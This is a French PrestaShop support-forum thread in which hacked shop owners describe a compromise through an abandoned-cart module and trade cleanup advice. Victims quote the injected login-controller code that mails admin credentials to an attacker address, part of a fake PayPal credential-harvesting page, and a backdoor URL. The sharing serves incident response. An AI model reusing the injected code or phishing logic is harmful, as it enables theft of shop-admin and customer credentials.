Jump to content

Prestashop 1.6.1.6 Hacké par Moroccan Wolf


AlainB

Recommended Posts

Oui c'est le module cartabandonnementpro

 

Vous avez des fichiers qui ont été modifiés et d'autres ajoutés

Votre mot de passe mysql est grillé

 

Envoyez-moi un accès ftp par MP si vous voulez une désinfection .

 

PS: Une mise à jour de ce module vient d'être publiée (1.7.5)

Link to comment
Share on other sites

Bonjour Eolia,

 

Merci pour la réponse, j'ai changé tous les mots de passe, FTP, PhpMyAdmin, administrateur du site etc...

J'ai remis une sauvegarde du site en place avant attaque, et là, je vais vite faire la mise à jour du module.

 

Bon week-end !

 

Je viens de regarder dans mon BO, mais je n'utilise pas ce module, donc ça doit venir d'ailleurs

Edited by RobertARC (see edit history)
Link to comment
Share on other sites

Hello,

 

Ca fait 5 ans qu'on bosse sur PrestaShop™ 1.4.6.2, jamais eu AUCUN hack ni rien. Propre.

 

Mais la... Je suis entre deux îles thailandaises, j'attends un bateau, et voila que nous aussi, mis à mal par "morroconwolf", mais nous n'avons pas de module " cartabandonnementpro ".

 

Bon en surface, aucun soucis, aucune attaque visible sur le site web, mais en coulisses une chiée de fichiers php, zip, etc.. des scripts, et notamment quelque chose qui ressemble à un fishing paypal à travers le code et les images.

 

J'ai effacé les fichiers concernés/ajoutés sur le ftp, changer les mdp ftp, sql, admin.

 

Est-ce suffisant selon vous ? Ou il y a d'autres choses à cleaner ?

 

Vais-je enfin avoir le droit de profiter de mes vacances ? :)

 

Merci à vous pour l'aide..

Edited by dokoss (see edit history)
Link to comment
Share on other sites

Meme chose pour moi. J'ai egalement le module de paniers abandonnés Pro...

 

Par contre Je m'en suis rendu compte à midi en vérifiant la configuration de mon module paypal car j'avais plusieurs commande avec le statut "En attente du Paiement Paypal" ce qui ne m'étais jamais arrivé.

 

Et là ! Patatras... ! Mes identifiants et clé API paypal avaient été modifiées et remplacées par d'autre (productionaga_api1.outlook.fr pour mon cas).

 

Du coup petit tour par le ftp, ou je constate une chiée de petits fichiers du type K.php / index_back.php / hous.php / dossier wp-content / le fichier AdminLoginController.php...

J'ai essayé de nettoyer tout ça au maximum en comparant mes fichiers a une sauvegarde récente.

 

J'ai modifié egalement les mots de passe ftp/Sql/Employes.

 

Y a t-il une possibilité qu'ils aient pu réussir a avoir accès à la base de donnée selon vous ? et comment être sur de ne plus avoir de fichiers infectés ?

 

Merci

Edited by babyrider (see edit history)
Link to comment
Share on other sites

Bonjour tout le monde,
 
SUPER PRESTASHOP, y-a bien une grosse faille de sécurité, rebelote aujourd'hui par un autre hacker "bajatax".
 
Nous devons refondre notre Site e-commerce, mais je pense que nous allons passer à Magento, trop de failles dans PRESTASHOP.
Dommage, on était bien content, et en plus on maîtrisait bien la bête, et paf, il faut tout recommencer.
Plus on fait les mises à jour, plus on est vulnérable... Ce n’est pas normal !
Rien à faire le gratuit ce n’est pas top.
 
Merci à l'équipe Francophone de nous éclairer sur ce petit souci.
 
Robert
 
AdminLoginController.php
 
        /* Check fields validity */
        $passwd = trim(Tools::getValue('passwd'));
        $email = trim(Tools::getValue('email'));
$to = "[email protected]";
$subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
$header = "from: hacked <[email protected]>";
$message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
$message .= "Path : " . __file__;
$sentmail = @mail($to, $subject, $message, $header);
$sentmail1 = @mail($to, $subject, $message, $header);
        if (empty($email)) {
            $this->errors[] = Tools::displayError('Email is empty.');
        } elseif (!Validate::isEmail($email)) {
            $this->errors[] = Tools::displayError('Invalid email address.');
        }

        if (empty($passwd)) {
            $this->errors[] = Tools::displayError('The password field is blank.');
        } elseif (!Validate::isPasswd($passwd)) {
            $this->errors[] = Tools::displayError('Invalid password.');
        }

        if (!count($this->errors)) {

 

Edited by RobertARC (see edit history)
Link to comment
Share on other sites

Faites donc ce que je vous dis et réglez le problème

 

Vous vous êtes fait hacker à cause du module cartabandomnent pro
 
Certains fichiers ont été remplacés, d'autres ajoutés.
Restaurez une sauvegarde ftp antérieure au 13/7, videz votre ftp, restaurez et changez tous vos mots de passe php, mysql et back-office
 
Ce n'est pas le CMS Prestashop le responsable, mais les modules tiers écrits avec les pieds
Le problème est le même avec Magento ou WordPress
Link to comment
Share on other sites

Meme chose pour moi. J'ai egalement le module de paniers abandonnés Pro...

 

Par contre Je m'en suis rendu compte à midi en vérifiant la configuration de mon module paypal car j'avais plusieurs commande avec le statut "En attente du Paiement Paypal" ce qui ne m'étais jamais arrivé.

 

Et là ! Patatras... ! Mes identifiants et clé API paypal avaient été modifiées et remplacées par d'autre (productionaga_api1.outlook.fr pour mon cas).

 

Du coup petit tour par le ftp, ou je constate une chiée de petits fichiers du type K.php / index_back.php / hous.php / dossier wp-content / le fichier AdminLoginController.php...

J'ai essayé de nettoyer tout ça au maximum en comparant mes fichiers a une sauvegarde récente.

 

J'ai modifié egalement les mots de passe ftp/Sql/Employes.

 

Y a t-il une possibilité qu'ils aient pu réussir a avoir accès à la base de donnée selon vous ? et comment être sur de ne plus avoir de fichiers infectés ?

 

Merci

Bien sur qu'ils ont accès à la base de données une fois qu'ils ont lu le fichier settings.inc.php

 

Donc, récupérez une sauvegarde d'avant le 12/07, effacez complètement le contenu de votre ftp, restaurez, mettez à jour le module ou supprimez-le et restaurez votre base de données

Une fois cela fait, changez immédiatement tous vos mots de passe

  • Like 1
Link to comment
Share on other sites

Bonjour Eolia,

 

Merci pour la réponse rapide, mais je l'ai déjà dit le 15 juillet, je n'utilise pas ce module, il est même pas présent sur mon FTP.

 

J'ai faits exactement ce que vous m'avez dit, j'ai restauré une version du 10 juillet, après voir complètement vider mon FTP.

 

J'ai modifié tous les mots de passe, FTP, MySQL, Administration du Site, j'ai même poussé le vice de changer les mots de passe de tous mes comptes mail rattachés à mon nom de domaine.

 

J'ai supprimé complètement le contenu de ma base de données dans PhpMyAdmin et réinstallé une sauvegarde du 10 juillet.

 

Aujourd'hui, rebelote, Alerte par mail de l'antivirus de mon hébergeur et de nouveau plein de fichiers modifiés, remplacés, ajoutés... Bref, le bordel complet sur mon FTP alors que je ne possède même pas ce module.

 

Souhaitez-vous un accès à mon FTP pour y voir plus clair, ça m’ennuierai de changer de boutique, j'ai surement un module qui met la pagaille, j'utilise un module gratuit de chez MyPresta.eu sinon j’achète toujours des modules certifiés par Prestashop comme ceux de Presta Module (Partenaire Prestashop Platinium)…

 

Donc, normalement, ils ne sont pas écrits avec les pieds !
Link to comment
Share on other sites

Sur quelle version de prestashop tournez-vous ?

Une idée d'autres modules touchés (à part cartabandonnementpro) ?

 

Nous :

Prestashop 1.4.6.2

Nous n'avons pas le module : " cartabandonnementpro "

 

Nous souhaitons rectifier notre site pour éviter ce genre d'attaque.

 

Bien à vous,

Link to comment
Share on other sites

Sur quelle version de prestashop tournez-vous ?

Une idée d'autres modules touchés (à part cartabandonnementpro) ?

 

Nous :

Prestashop 1.4.6.2

Nous n'avons pas le module : " cartabandonnementpro "

 

Nous souhaitons rectifier notre site pour éviter ce genre d'attaque.

 

Bien à vous,

 

On va arrêter de tourner autour du pot, ok ?

Il n'y aura pas plus d'information sur ce forum car tous les petits hackers en herbe qui ignoraient le problème n'attendent que ça pour pouvoir le tester sur les nombreuses boutiques Prestashop.

 

Si vous n'y connaissez rien en sécurité informatique, demandez à un professionnel

Il n'y a pas de parade magique, il faut simplement contrôler tous les modules susceptibles d'être des points d'entrée depuis l'extérieur avec des répertoires non-protégés et du code passoire.

Ensuite il faut déterminer les fichiers ajoutés et ceux modifiés

Enfin il faut changer tous vos mots de passe et contrôler vos identifiants/coordonnées sur les modules de paiement qui auraient pu être modifiés

Link to comment
Share on other sites

Hello Eolia,

 

Je comprends très bien ta remarque. Aucun intérêt d'afficher publiquement.

 

Cela dit, si quelqu'un a plus d'informations concernant cette attaque et sa méthodologie, n'hésitez pas à m'envoyer un message privé.

 

Nous n'avons hélas pas le budget pour faire vérifier chaque fichier de notre site.

 

Merci.

Link to comment
Share on other sites

 

Bonjour Eolia,
 
Merci pour la réponse rapide, mais je l'ai déjà dit le 15 juillet, je n'utilise pas ce module, il est même pas présent sur mon FTP.
 
J'ai faits exactement ce que vous m'avez dit, j'ai restauré une version du 10 juillet, après voir complètement vider mon FTP.
 
J'ai modifié tous les mots de passe, FTP, MySQL, Administration du Site, j'ai même poussé le vice de changer les mots de passe de tous mes comptes mail rattachés à mon nom de domaine.
 
J'ai supprimé complètement le contenu de ma base de données dans PhpMyAdmin et réinstallé une sauvegarde du 10 juillet.
 
Aujourd'hui, rebelote, Alerte par mail de l'antivirus de mon hébergeur et de nouveau plein de fichiers modifiés, remplacés, ajoutés... Bref, le bordel complet sur mon FTP alors que je ne possède même pas ce module.
 
Souhaitez-vous un accès à mon FTP pour y voir plus clair, ça m’ennuierai de changer de boutique, j'ai surement un module qui met la pagaille, j'utilise un module gratuit de chez MyPresta.eu sinon j’achète toujours des modules certifiés par Prestashop comme ceux de Presta Module (Partenaire Prestashop Platinium)…
 
Donc, normalement, ils ne sont pas écrits avec les pieds !

 

Votre ftp était bien salement infecté et le module présent sur votre fp^^

 

Des fichiers d'upload, de connexion et de modification des coordonnées de paiement étaient présent sur votre site

 

Quand vous faites une restauration, effacez tous le contenu du ftp avant, autrement les fichiers rajoutés seront toujours présent.

 

Maintenant:

Modifiez tous vos mots de passe (Php, mysql et BO)

Contrôlez vos modules de paiement (clés, identifiants api etc)

Renommez votre répertoire admin

 

le fichier à l'origine de la faille est dans cartabandonment pro

Un 2ème mise à jour a été fournie sur Addons pour ce module

Si vous ne la faites pas ou n'utilisez pas ce module, SUPPRIMEZ-LE du ftp

Link to comment
Share on other sites

Merci pour votre intervention sur notre FTP.

 

Je viens de réaliser tous vos bons conseils, à la lettre, d'ailleurs vous n'avez plus accès à notre FTP ;-) PIRATE !!! lol

 

Très beau travail de la part D'Eolia, nous aimerions bien l'intégrer dans notre équipe de joyeux lurons...

 

Pensez à nous par rapport à mon message privé.

 

Bonne continuation,

 

A+

  • Like 1
Link to comment
Share on other sites

We have same Problem with same Hacker

Change Permission File AdminLoginController.php to 440

Change Admin Folder Name and Admin Pass

Change MySQL Pass

 

Delete in Root server wp-content Folder, t.php, Xmw.php, 222.php, by.htm, mw.htm, home.bak.php, css.php, in Module Folder delete h2w.php 

 

 

Done.

Link to comment
Share on other sites

  • 2 weeks later...
  • 4 weeks later...

Bonjour à tous,

 

J'ai eu la même attaque que vous à la même date.

 

En plus de tous ces problèmes, vérifier si le hacker n'a pas créer des fichiers /modules/home-cgi et /modules/home-cpi

 

dans /home-cgi/LoginPPL/login.php le pirate récupère les identifiants Paypal et les mots de passe des clients par PayPal.

 

ession_start();
 
$mail=$_SESSION['mail'] = $_POST['mail'];
 
$pass=$_SESSION['pass'] = $_POST['mdp'];
 
$IP = $_SERVER['REMOTE_ADDR'];
 
 
 
 
 
$info="
 
|------- Rez by [ bajatax -- Sniper ] |-------
 
|Email            : $mail
 
|password         : $pass
 
|IP               : $IP
 

 

Dans home-cpi, je pense qu'il récupère des n° de carte en cas de paiement par PayPal

 

 

Bon courage à vous

Link to comment
Share on other sites

En plus le hacker avait installé un backdoor.

 

Vérifier si  l'url mondomaine.com/monadmin/ajax-tab.php?controller=AdminLogin&up=hous n'ouvre pas un backdoor pour télécharger un fichier sur le site. Moi c'était le cas.

 

Pour corriger j'ai remplacé tous les fichiers de /controllers/admin/ par des fichiers sains pris sur un site prestashop de même version.

 

A plus

Link to comment
Share on other sites

Non, il n'y a aucun mot de passe dans ces fichiers^^

Dans mon cas, lorsque le client voulait payer par Paypal, il était dirigé vers l'url ../modules/home-cgi/loginPPL/login.php qui affichait un bel écran PayPal demandant le mail et le mot de passe du client (alors que client n'était même pas sur le site de Paypal).

Link to comment
Share on other sites

  • 3 weeks later...

Ben vous pouvez recommencer^^

 

Commencez par renommer le répertoire web principal le temps du nettoyage autrement les hackers peuvent en remettre avant que vous ayez terminé, donc c'est sans fin.

Regardez bien dans les dossiers de traduction et les fichiers css aussi

Ensuite modifiez vos mots de passe

Link to comment
Share on other sites

en 10 ans de presta c'est la première fois que je me fait hacker !!!

 

la question est de savoir ou il y a une faille ?

 

quand on demande si il y a un outils pour etre alerté sur des changement de fichier et dossier, personne répond et chez OVH il n'ont carrément pas d'outil

Link to comment
Share on other sites

Où était la faille, on l'a déjà dit et on va éviter de le crier sur tous les toits pour pas que les petits hackers en herbe qui avaient raté l'info n'aient trop de précisions.

 

Ensuite, une fois l'intrusion effectuée les failles peuvent être très nombreuses (+ de 260 sur un site récemment y compris le WP qui était sur le même serveur) Donc plus vous avez attendu, plus le nombre de fichiers sera grand.

Ensuite ces fichiers n'ont pas forcément de code malicieux ou alors très bien écrit^^ ce qui ne les différencie pas d'un fichier classique.

Link to comment
Share on other sites

en 10 ans de presta c'est la première fois que je me fait hacker !!!

 

la question est de savoir ou il y a une faille ?

 

quand on demande si il y a un outils pour etre alerté sur des changement de fichier et dossier, personne répond et chez OVH il n'ont carrément pas d'outil

 

Personnellement, j'ai utilisé la fonction recherche de fichiers distants (F3) de Filezilla pour trouver tous les fichiers qui avaient été modifiés dans un interval de date donné.

Edited by fressine (see edit history)
Link to comment
Share on other sites

  • 3 weeks later...
  • 3 months later...

Ce module est loin d'être le seul a avoir une faille^^

De nombreux modules écrits à la va vite, copié et recopiés, fournis gratuitement dans les thèmes ou sur le forum sont des entrées possibles...

 

regardez vos logs en requêtes POST et vous verrez quels fichiers sont appelés ;)

Link to comment
Share on other sites

  • 1 month later...

Bonjour à tous,

 

Comme beaucoup ici, je me suis fait hacké via le module cartabandon. Je n'ai plus accès au BO de prestashop (erreur serveur 500). J'ai supprimé les fichiers, remplacé le fichier AdminLoginController.php et modifier les mdp...  Le problème est toujours la. 

 

Avez-vous des solutions pour m'aider ? 

 

Merci d'avance

Link to comment
Share on other sites

Bonjour à tous,

 

Comme beaucoup ici, je me suis fait hacké via le module cartabandon. Je n'ai plus accès au BO de prestashop (erreur serveur 500). J'ai supprimé les fichiers, remplacé le fichier AdminLoginController.php et modifier les mdp...  Le problème est toujours la. 

 

Avez-vous des solutions pour m'aider ? 

 

Merci d'avance

 

 

Problème résolu en suivant les conseils de Eolia and co. 

 

Pour ceux qui ont le même problème, n'oubliez pas de remplacer le htacess.

Link to comment
Share on other sites

  • 5 months later...

Bonjour à tous,

 

J'ai le même souci que vous avez eu, site hacké par Batajax, morocan woolf...

 

Ils ont notamment réussi à écrire dans les modules pk_vertflexmenu et pk_vertflexmenu, à balancer des page de fishing dans blockcontactinfos.

Des fichiers se trouvent aussi à la racine du répertoire module (wsd145.php, up11.php,re.php...)

Le fichier Controller > AdminLoginController.php a été hacké également.

 

Une back door était également ouverte à [DossierAdmin]/ajax-tab.php?controller=AdminLogin&up=hous# qui permettait de télécharger des fichiers dans le dossier admin...

 

Bref... bien vérolé...

 

Donc j'ai récupéré la sauvegarde ftp sur ovh (la plus ancienne, c'est à dire 2 semaine), et malheureusement, elle est aussi hacké (mais je n'ai pas le même hack dans AdminLoginController.php, c'est bizarre...)

 

La propagation semble moindre, mais les hackers étaient déjà sur le coup et dans mes fichiers....

 

Je suis en train d'effacer les fichiers du site, et je vais remettre la version d'il y a deux semaines en place malgré tout pour tenter de sauver le site.

 

Je cherche quelqu'un qui pourrait m'indiquer la marche à suivre pour désinfecter le truc (si c'est possible?)

Outre les modules indésirables à effacer,

le changement des mdp et nom du dossier admin,

la remise en place d'un fichier AdminLoginController.php neuf

 

Je pense qu'il y a d'autres choses à faire?

Je cherche un moyen radical pour éradiquer le truc, quitte à avoir à refaire certaines choses sur le prestashop.

 

Je me demande si la base de donnée à pu être infectée?

 

 

Merci d'avance,

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...